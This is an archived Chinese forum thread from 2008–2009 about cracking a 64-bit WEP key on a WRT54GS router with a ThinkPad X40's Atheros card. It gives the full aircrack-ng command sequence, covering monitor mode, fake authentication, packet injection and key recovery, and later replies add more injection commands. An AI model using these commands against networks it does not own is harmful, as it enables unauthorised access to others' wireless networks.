论坛 › 无线安全新手入门 › IBM Thinkpad X40原配11a/b/c atheros无线网卡破解有客户端WEP过程

abcchan 发表于 2008-9-18 23:22

IBM Thinkpad X40原配11a/b/c atheros无线网卡破解有客户端WEP过程

:Q 我的是X40原配的11a/b/c miniPCI 无线网卡，是atheros芯片的，具体哪一款不了解，本本是03年底生产的估计是5001之类的，AP是WRT54GS V2.0的，设置为wep 64位的，在BT3beta里面按照以下顺序中午破了一次

AA:AA:AA:AA:AA:AA是路由的MAC，BB:BB:BB:BB:BB:BB是本本网卡MAC

窗口1
airmon-ng start wifi0 6
wlanconfig ath0 destroy
ifconfig ath1 up
iwconfig ath1 mode monitor channel 6
airodump-ng --ivs --channel 6 --bssid AA:AA:AA:AA:AA:AA --write abc ath1
这时候data里面已经断断续续的有些了


窗口2
aireplay-ng -1 0 -e yuxin -a AA:AA:AA:AA:AA:AA -h BB:BB:BB:BB:BB:BB ath1

aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b AA:AA:AA:AA:AA:AA -h BB:BB:BB:BB:BB:BB ath1

之后data暴涨，到了3w以上开窗口3
这一步如果换作-3、-4、-5都成功，但是data跟没攻击一样的慢慢升，没用，只有-2 -p的这个可以暴涨

窗口3
aircrack-ng -n 64 -b AA:AA:AA:AA:AA:AA *.ivs

一直开着，大概data到了60w时候破解出来。




然后！！！！！！！！！！！！！
我把AP复位了下（版本是DD-WRT V24 SP1 MEGA)，重新设置了WEP，然后就不行了，不管怎么弄都没有data了，一直为0，

查了是只能破有客户端的，无客户端的不行
是不是我哪里出错了？？？？
帮助在吗？帮帮我哦
有客户端的可以破 ，无客户端的就不行啊，2太都这样，X40的和T43的2200BG都这样啊，是不是我哪里出错了？有客户端的时候用-3破加-0就可以了，无客户端用-2 -p 0841和-5 、-4都没有做到包


[ 本帖最后由 abcchan 于 2008-9-19 14:11 编辑 ]

liangyi110 发表于 2008-9-18 23:33

第一次都成功了应该没问题的！DATA不增长？aireplay-ng -1 0 -e yuxin -a AA:AA:AA:AA:AA:AA -h BB:BB:BB:BB:BB:BB ath1 命令成功了没有？
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b AA:AA:AA:AA:AA:AA -h BB:BB:BB:BB:BB:BB ath1这个命令后有发包没有？

test2008 发表于 2008-9-19 07:33

对，只有自己再试试了

abcchan 发表于 2008-9-19 08:17

第一次都成功了应该没问题的！DATA不增长？aireplay-ng -1 0 -e yuxin -a AA:AA:AA:AA:AA:AA -h BB:BB:BB:BB:BB:BB ath1 命令成功了没有？
这条成功了！
aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b AA:AA:AA:AA:AA:AA -h BB:BB:BB:BB:BB:BB ath1这个命令后有发包没有？
没有发包！
不知道怎么了

abcchan 发表于 2008-9-19 09:00

版主救救我吧!!!!!!!!!

testname 发表于 2008-9-20 22:29

LZ问一下 你中卫地教程看过了吗？ 那个教程对你有很大地帮助

我与你一样 是 5001X的卡 我是 IBM T30 有什么问题可以相互讨论一下

我也试了几天了 如果DATA数据一直为零 你我这样地小鸟现在还没有办法
你只有等待等待再等待 DATA有合法数据就可以了 只要连续地有几百数据 就够了
有了以上几百地数据 你就足够完成
aireplay-ng -2 -r myarp -x 256 ath1 这一步了
接下来 Data 数据才有可能猛涨 合法地Data 数据越多就涨地也快

abcchan 发表于 2008-10-7 12:55

原帖由 testname 于 2008-9-20 22:29 发表 http://forum.anywlan.com/images/common/back.gif
LZ问一下 你中卫地教程看过了吗？ 那个教程对你有很大地帮助

我与你一样 是 5001X的卡 我是 IBM T30 有什么问题可以相互讨论一下

我也试了几天了 如果DATA数据一直为零 你我这样地小鸟现在还没有办法
你只有等 ...

现在又有个问题了，就是用bt3 beta的按照上面的不行，但是用spoonwep2就行

artqi 发表于 2009-7-6 09:51

非常好的帖子啊 !大家来解答

亮晶晶 发表于 2009-10-11 14:48

我是A31的机器，原装的网卡不行，换了个AR5005G驱动的网卡能破解了，但好像不支持注入，没有客户端的破不了，自己的路由器破了半天才5个DATA包。

spig 发表于 2009-10-12 00:28

我的也是X40原配的11a/b/c miniPCI 无线网卡，一定要学下，

tvision08 发表于 2009-10-12 01:55

第一次都成功了应该没问题的！

查看完整版本: IBM Thinkpad X40原配11a/b/c atheros无线网卡破解有客户端WEP过程